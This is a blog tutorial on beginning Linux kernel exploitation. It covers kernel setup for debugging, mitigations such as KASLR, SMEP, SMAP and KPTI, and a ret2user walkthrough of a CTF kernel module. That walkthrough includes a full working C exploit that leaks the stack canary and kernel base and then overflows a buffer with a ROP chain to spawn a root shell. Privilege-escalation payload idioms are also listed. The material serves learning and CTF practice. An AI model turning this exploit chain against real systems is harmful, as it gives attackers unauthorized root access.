Linux Kernel Exploitation: Getting started & BOF
Table of contents
- Motivation
- Where are kernel exploits used?
- Linux kernel oversimplified
- Kernelspace vs Userspace exploitation (x86_64)
Motivation
I started my journey into Linux kernel exploitation for the following reasons:
- To improve my knowledge of the Linux kernel
- To write exploits for real-world bugs
- To research IoT devices with modified Linux kernels
- To pwn Google’s kCTF platform
- To get invited to conferences :)
Where are kernel exploits used?
Kernel exploits are used (to my knowledge) by the following groups of people:
- Threat actors: to escalate privileges
- Pentesters: to demonstrate impact
- Defenders: to come up with detections and mitigations
- Kernel / driver developers: to write patches
- Android / iOS superusers: to customize phones
Linux kernel oversimplified
The Linux kernel is a layer between user applications and hardware. It manages the CPU, memory, devices, file systems, networking, process control and much more. It’s a complex project with over 8 million lines of code and it’s still evolving. Such a dynamic project is an ideal research target.
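To make the "layer" idea concrete, here is a minimal sketch of a userspace program crossing into the kernel through a system call. The helper name raw_getpid is my own; it uses the generic syscall() wrapper instead of libc's getpid() to show that the request is ultimately served by the kernel.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Ask the kernel for our PID through the raw system call interface,
 * bypassing the libc getpid() wrapper. raw_getpid is a hypothetical
 * helper name used only for this illustration. */
pid_t raw_getpid(void)
{
    return (pid_t)syscall(SYS_getpid);
}
```

Calling raw_getpid() should return the same value as getpid(), since both end up in the same kernel handler.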
Kernelspace vs Userspace exploitation (x86_64)
If you’re coming from userspace exploitation (like me) you may notice the following differences when writing kernel exploits.
More instructions
Kernel code runs in ring 0, so it can execute privileged instructions that normally fault in userspace, such as:
- LGDT - Loads an address of a GDT into GDTR
- LLDT - Loads an address of a LDT into LDTR
- LTR - Loads a segment selector into the Task Register (TR)
- MOV Control Register - Copy data and store in Control Registers
- LMSW - Load a new Machine Status WORD
- CLTS - Clear Task Switch Flag in Control Register CR0
- MOV Debug Register - Copy data and store in debug registers
- INVD - Invalidate Cache without writeback
- INVLPG - Invalidate TLB Entry
- WBINVD - Invalidate Cache with writeback
- HLT - Halt Processor
- RDMSR - Read Model Specific Registers (MSR)
- WRMSR - Write Model Specific Registers (MSR)
- RDPMC - Read Performance Monitoring Counter
- RDTSC - Read time Stamp Counter
There are exceptions: RDTSC can also be executed from userspace unless the TSD flag in CR4 is set, and RDPMC is allowed from userspace when the PCE flag in CR4 is set.
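As a quick illustration of the RDTSC exception, the sketch below reads the time stamp counter from an ordinary userspace program. It assumes an x86 machine and GCC or Clang, which provide the __rdtsc() intrinsic in x86intrin.h; read_tsc is a name I made up for this example.

```c
#include <stdint.h>
#include <x86intrin.h> /* __rdtsc(), provided by GCC and Clang on x86 */

/* Read the time stamp counter from user mode.
 * If the kernel had set CR4.TSD, this instruction would fault and the
 * process would receive a signal instead of a value. */
uint64_t read_tsc(void)
{
    return __rdtsc();
}
```

Trying the same with a truly privileged instruction such as HLT from userspace ends with the process being killed by a signal.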
More registers
When debugging the kernel with gdb we can see additional registers:
- fs_base - base address of fs
- gs_base - base address of gs
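- k_gs_base - the IA32_KERNEL_GS_BASE MSR; the swapgs instruction exchanges its value with gs_base when switching from userspace to kernelspace or vice versa
- cr0 - control register with basic CPU mode flags (protected mode, paging, write protect)
- cr2 - holds the faulting linear address after a page fault
- cr3 - holds the physical address of the top-level page table
- cr4 - control register with feature flags (including SMEP, SMAP and TSD)
- cr8 - task priority register, used to mask external interrupts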
- efer - Extended Feature Enable Register
- mxcsr - control and status for SSE registers
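When looking at these registers in gdb, it helps to decode the interesting bits. Below is a small sketch that does this for a raw cr4 value (for example one copied from gdb). The bit positions come from the x86 architecture; the macro and function names are my own.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bit positions in CR4 as defined by the x86 architecture. */
#define CR4_TSD  (1ULL << 2)   /* restrict RDTSC to ring 0 */
#define CR4_SMEP (1ULL << 20)  /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)  /* Supervisor Mode Access Prevention */

/* Hypothetical helpers: each takes a raw CR4 value and tests one flag. */
bool cr4_has_tsd(uint64_t cr4)  { return (cr4 & CR4_TSD) != 0; }
bool cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
bool cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }
```

For instance, a cr4 value of 0x3006f0 has both SMEP and SMAP set, while 0x6f0 has neither.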
What are the goals of exploitation?
The goal usually revolves around gaining higher privileges on the system or gaining persistence.
Some of the goals can be:
Get root
- payload: commit_creds(prepare_kernel_cred(0))
Escape SECCOMP
- payload: current->thread_info.flags &= ~(1 << TIF_SECCOMP)
Run single command
- payload: run_cmd("/path_to_command")
Setup
Install prerequisites
sudo apt install -y bison flex libelf-dev cpio build-essential libssl-dev qemu-system-x86 libncurses-dev
Build the Linux kernel with debug symbols
git clone https://github.com/torvalds/linux # or download specific kernel version from https://mirrors.edge.kernel.org/pub/linux/kernel/
cd linux && make defconfig && make menuconfig
# Ensure that kernel hacking --> Compile-time checks and compiler options --> Compile the kernel with debug symbols is checked.
make -j$(nproc)
Build BusyBox
Download and decompress busybox (I chose the latest version at the time).
wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2
tar xvf busybox-1.36.1.tar.bz2
Build it.
cd busybox-1.36.1
make defconfig
make menuconfig
In the Settings menu (called Busybox Settings in older releases), under Build Options, enable Build static binary (no shared libs). Next, build BusyBox and install it into an output folder.
make
make CONFIG_PREFIX=./../busybox_rootfs install
Build initramfs
Create a directory hierarchy for initramfs.
mkdir -p initramfs/{bin,dev,etc,home,mnt,proc,sys,usr,tmp}
cd initramfs/dev
sudo mknod sda b 8 0
sudo mknod console c 5 1
Copy everything from the busybox_rootfs folder to the initramfs folder. Next, create an init file in the root of initramfs, and write the following into it:
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
/bin/mount -t devtmpfs devtmpfs /dev
chown 1337:1337 /tmp
setsid cttyhack setuidgid 1337 sh
exec /bin/sh
Make the script executable.
chmod +x init
Create initramfs itself.
find . -print0 | cpio --null -ov --format=newc > initramfs.cpio
gzip ./initramfs.cpio
This will create the initramfs.cpio.gz file, which we will use as the filesystem for our qemu-emulated Linux kernel.
Run with qemu
qemu-system-x86_64 \
-m 512M \
-nographic \
-kernel bzImage \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 nopti nokaslr" \
-no-reboot \
-cpu qemu64 \
-smp 1 \
-monitor /dev/null \
-initrd initramfs.cpio.gz \
-net nic,model=virtio \
-net user \
-gdb tcp::1234 \
-S
The -gdb tcp::1234 flag starts a gdbstub listener on port 1234. The -S flag keeps the CPU halted at startup until execution is continued from the gdb debugger.
Debugging
For debugging, run the qemu instance with the -gdb and -S flags. Open gdb in another terminal and enter:
target remote :1234
As for gdb extensions, use whichever one works for you. I use gef, although most things can be accomplished with plain gdb.
Shellcoding
If you know what you want to accomplish with code but don’t know how to do it at the assembly level, write a kernel module, compile it and dump the assembly.
objdump -M intel -d test.ko
Kernel modules
Kernel modules are pieces of code that can be loaded into and unloaded from the kernel on the fly, without rebooting the system. They are a great starting point for learning kernel exploitation because they run with kernel privileges.
To load a kernel module you can use:
sudo insmod <module_name.ko>
To unload a kernel module:
sudo rmmod <module_name>
To list currently loaded modules:
lsmod
Kernel modules that expose a device or /proc file register a struct file_operations (often named fops), which specifies the handlers invoked when userspace calls open, read, write, close or ioctl on that file (.release is the handler behind close).
static struct file_operations module_fops =
{
.owner = THIS_MODULE,
.read = module_read,
.write = module_write,
.open = module_open,
.release = module_close,
};
We can start auditing each of these functions in our search for bugs.
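From the userspace side, these handlers are reached with ordinary file system calls. The sketch below shows which call ends up in which handler; the helper names are hypothetical and the path is whatever file the module registers.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Write len bytes to the file at path.
 * Returns what the driver's .write handler returned, or -1 if open failed. */
ssize_t write_to_device(const char *path, const void *data, size_t len)
{
    int fd = open(path, O_WRONLY);     /* reaches the .open handler */
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, len);  /* reaches the .write handler */
    close(fd);                         /* last close reaches .release */
    return n;
}

/* Read up to len bytes from the file at path.
 * Returns what the driver's .read handler returned, or -1 if open failed. */
ssize_t read_from_device(const char *path, void *buf, size_t len)
{
    int fd = open(path, O_RDONLY);     /* reaches the .open handler */
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, len);    /* reaches the .read handler */
    close(fd);
    return n;
}
```

A safe way to try the helpers is /dev/null, whose driver accepts every write and returns 0 bytes on read.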
Mitigations
- KASLR - randomizes the base address of the kernel at boot (similar to userspace ASLR)
- FG-KASLR - Function Granular KASLR randomizes the location of individual functions, so a single leaked address no longer reveals the rest of the layout
- Kernel Stack Canary - a value placed on the stack before the return address and checked before the function returns, which stops simple stack buffer overflows (same as in userspace)
- SMEP - Supervisor Mode Execution Prevention prevents the kernel from executing code located in userspace memory
- SMAP - Supervisor Mode Access Prevention prevents the kernel from reading or writing userspace memory, except in explicitly marked code paths
- KPTI - Kernel Page Table Isolation gives userspace and kernelspace separate page tables as a mitigation against the Meltdown CPU bug
More mitigations can be found at https://github.com/a13xp0p0v/linux-kernel-defence-map
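Before writing an exploit it is worth checking which mitigations are active on the target. SMEP and SMAP show up as smep and smap in the flags line of /proc/cpuinfo, and boot options such as nokaslr and nopti show up in /proc/cmdline. The sketch below only does the token matching on a line that has already been read; has_token is a name I chose for this example.

```c
#include <assert.h>
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Return true if token appears in line as a whole whitespace-separated
 * word, so that "smep" does not match inside a longer word. */
bool has_token(const char *line, const char *token)
{
    assert(line != NULL && token != NULL);
    size_t len = strlen(token);
    if (len == 0)
        return false;
    for (const char *p = strstr(line, token); p != NULL;
         p = strstr(p + 1, token)) {
        bool starts_word = (p == line) || isspace((unsigned char)p[-1]);
        bool ends_word = p[len] == '\0' || isspace((unsigned char)p[len]);
        if (starts_word && ends_word)
            return true;
    }
    return false;
}
```

For example, has_token(cmdline, "nokaslr") tells us whether KASLR was disabled at boot, given the content of /proc/cmdline in cmdline.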
Ret2user
Let’s take a look at the ret2user technique which is commonly used to escalate privileges. For this example I chose a challenge from K3RN3LCTF 2021 called easy_kernel which can be downloaded here: https://github.com/seal9055/seal9055.github.io/blob/main/docs/kernel/kernel_rop.tar.gz
Vulnerability analysis
As I mentioned before, kernel modules are a great way to start learning Linux kernel exploitation. In this challenge we are provided with a vulnerable kernel module, vuln.ko, and its source code in vuln.c.
Analyzing the s_read function, we notice a fixed-size message buffer.
static ssize_t s_read(struct file *file, char __user *ubuf, size_t size, loff_t *offset)
{
char message[40];
strcpy(message, "Welcome to this kernel pwn series");
if (raw_copy_to_user(ubuf, message, size) == 0) {
printk(KERN_ALERT "%ld bytes read by device\n", size);
}
else {
printk(KERN_ALERT "Some error occured in read\n");
}
return size;
}
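The size argument is controlled by the caller and never checked against the 40-byte message buffer, so reading more than 40 bytes discloses adjacent kernel stack memory. This information leak is useful for bypassing KASLR and Kernel Stack Canaries.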
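Here is a sketch of how the leaked words can be interpreted. The indices 5 and 7 and the offset 0x25de2e are the values used by the exploit later in this post and are specific to this challenge's kernel build; the struct and function names are my own, and the alignment check is just a cheap sanity test.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define CANARY_IDX 5           /* 40-byte buffer / 8 bytes per word */
#define RET_IDX    7           /* leaked kernel text address */
#define RET_OFFSET 0x25de2eUL  /* offset of that address from the kernel base */

struct leak {
    unsigned long canary;
    unsigned long kernel_base;
};

/* Extract the canary and kernel base from words read off the kernel stack.
 * Returns false if too few words were read or the computed base is not
 * page-aligned, which would mean the assumed offsets are wrong. */
bool parse_leak(const unsigned long *words, size_t nwords, struct leak *out)
{
    assert(words != NULL && out != NULL);
    if (nwords <= RET_IDX)
        return false;
    out->canary = words[CANARY_IDX];
    out->kernel_base = words[RET_IDX] - RET_OFFSET;
    return (out->kernel_base & 0xfffUL) == 0;
}
```

With KASLR disabled, a leaked return address of 0xffffffff8125de2e would give a base of 0xffffffff81000000.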
Analyzing the s_write function, we notice it’s similar, but instead of reading from the buffer we write values into it.
static ssize_t s_write(struct file *file, const char __user *ubuf, size_t size, loff_t *offset)
{
char buffer[40];
if (raw_copy_from_user(buffer, ubuf, size) == 0) {
printk(KERN_ALERT "%ld bytes written to device\n", size);
}
else {
printk(KERN_ALERT "Some error occured in write\n");
}
return size;
}
Calling this function with more than 40 bytes triggers a stack buffer overflow, because size is again not checked against the buffer.
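For comparison, this is roughly what the missing check looks like. It is a userspace sketch, not the challenge author's code: memcpy stands in for the kernel's copy from userspace, and checked_write is a hypothetical name.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

#define BUF_SIZE 40

/* Userspace stand-in for a fixed s_write: reject any request that does
 * not fit into the 40-byte stack buffer before copying. */
ssize_t checked_write(const void *src, size_t size)
{
    char buffer[BUF_SIZE];

    if (size > sizeof(buffer))
        return -EINVAL;        /* refuse instead of overflowing the stack */
    memcpy(buffer, src, size); /* stand-in for the copy from userspace */
    return (ssize_t)size;
}
```

With this check a 40-byte write succeeds and a 41-byte write is rejected with -EINVAL, so the canary and return address are never reached.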
Exploitation
We have everything we need to start writing an exploit. Since the initramfs has no libc, we compile the exploit statically and pack it into the initramfs file system.
This is the plan for writing an exploit:
- Leak the Kernel Stack Canary
- Leak a kernel address to bypass KASLR
- Save state for switching context between user-land and kernel-land (save registers so they can be restored later)
- Write a ROP chain to bypass SMEP (Execution Prevention) and trigger the buffer overflow
- Get a shell with system("/bin/sh")
- Register a SIGSEGV signal handler as a KPTI bypass: the chain returns to userland while the kernel page tables are still active, so the process segfaults, and the handler then runs in userland with the new credentials
Below is an example of an exploit utilizing the ret2user technique and bypassing KASLR, Kernel Stack Canary, SMEP, SMAP and KPTI:
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
void spawn_shell() {
puts("[+] Returned to userland");
if (getuid() == 0) system("/bin/sh");
else puts("[-] Not root");
}
unsigned long user_cs, user_ss, user_rflags, user_rsp;
int main() {
// KPTI bypass
signal(SIGSEGV, spawn_shell);
int fd = open("/proc/pwn_device", O_RDWR);
if (fd < 0) {
puts("[-] Failed to open device");
exit(1);
}
puts("[+] Opened device");
// Leak
unsigned long buff[80] = {0};
read(fd, buff, 64);
unsigned long cookie = buff[5];
unsigned long base = buff[7] - 0x25de2e;
printf("[+] Leaked cookie: 0x%lx\n", cookie);
printf("[+] Leaked base: 0x%lx\n", base);
// Save state
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
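// Overflow: 40 bytes of padding, the canary, one saved word, then the return address
unsigned long payload[40] = {[0 ... 39] = 0x4141414141414141};
int i = 5; // 40-byte buffer / 8 bytes per word
payload[i++] = cookie; // restore the stack canary
i++; // payload[6]: saved word between canary and return address stays as padding
payload[i++] = base + 0x001778; // pop rdi; ret;
payload[i++] = 0x0; // rdi = 0
payload[i++] = base + 0x08c340; // prepare_kernel_cred
// No gadget moves rax into rdi here, so the chain relies on rdi already
// holding the new cred pointer when prepare_kernel_cred returns on this build.
payload[i++] = base + 0x08bf00; // commit_creds
payload[i++] = base + 0xc00f58; // swapgs; ret;
payload[i++] = base + 0x024952; // iretq; ret;
// iretq frame: RIP, CS, RFLAGS, RSP, SS
payload[i++] = (unsigned long)spawn_shell; // userland rip
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
write(fd, payload, sizeof payload);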
return 0;
}
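The last five payload entries are not arbitrary: in 64-bit mode iretq pops RIP, CS, RFLAGS, RSP and SS from the stack, in that order. The sketch below captures that layout as a struct and appends it to a chain of 64-bit words; the type and function names are my own and are not part of the exploit above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stack frame consumed by iretq in 64-bit mode, lowest address first. */
struct iretq_frame {
    uint64_t rip;    /* where execution resumes in userland */
    uint64_t cs;     /* saved user code segment selector */
    uint64_t rflags; /* saved flags */
    uint64_t rsp;    /* saved user stack pointer */
    uint64_t ss;     /* saved user stack segment selector */
};

_Static_assert(sizeof(struct iretq_frame) == 5 * sizeof(uint64_t),
               "iretq frame must be exactly five 64-bit words");

/* Append the frame to chain starting at index at.
 * Returns the next free index. The caller must make sure that chain has
 * room for five more words. */
size_t push_iretq_frame(uint64_t *chain, size_t at, const struct iretq_frame *f)
{
    assert(chain != NULL && f != NULL);
    chain[at++] = f->rip;
    chain[at++] = f->cs;
    chain[at++] = f->rflags;
    chain[at++] = f->rsp;
    chain[at++] = f->ss;
    return at;
}
```

This is why the state has to be saved before the overflow: cs, ss, rflags and rsp must describe a valid userland context, otherwise the return faults immediately.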
Video
Below is a video of a talk I gave at BSidesLjubljana in June 2023.